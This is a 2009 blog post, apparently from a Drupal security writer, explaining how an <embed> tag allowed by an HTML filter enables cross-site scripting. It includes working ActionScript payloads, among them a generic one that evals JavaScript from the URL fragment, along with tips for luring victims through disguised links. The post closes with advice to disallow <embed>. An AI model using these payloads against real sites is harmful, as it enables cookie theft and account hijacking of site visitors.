Using <embed> for XSS

Heine —Fri, 2009/10/30 - 18:38

I see a lot less stray <script> tags in the "Allowed HTML tags:" of the HTML filter these days. The <embed> tag is something I still see a lot in misconfigured formats.

It's rather easy to exploit such formats to execute JavaScript with a little bit of ActionScript:

class Main
{
static function main(){
getURL('javascript:alert(document.cookie)');
}
}

Build with an ActionScript 2 compiler (eg Flex SDK), upload to a convenient location *), then make a post on the site that was so careless to allow the <embed> tag:

Now all you have to do is lead the victim to this URL:

<a href="http://victims-site.example.com/your_swf_post">Spam on the forum</a>

If you can't be bothered to change your swf file all the time, you can attempt to create a generic XSS attack that fetches JS from the URL fragment:

class Main
{
static function main(){
getURL('javascript:eval(document.location.hash.substr(1))');
}
}

The victim now has to visit (use a URL shortener for maximum obfuscation):

<a href="http://victims-site.example.com/your_swf_post#alert('another boring alert')">Spam on the forum</a>

That's it folks. Moral of the story: don't allow <embed> use in the HTML filter. If you need to embed videos, employ one of the modules that insert videos from trusted sources and prevent script interaction.

*) Bonus points if you upload the swf to another misconfigured Drupal site! Hint:

"Only files with the following extensions may be uploaded" swf

Comments

Thanks Heine, I've often

Submitted by dalin (not verified) on Sun, 2009/11/01 - 13:27

Thanks Heine, I've often tried to find the details of why embed was dangerous but could never find it.

Heine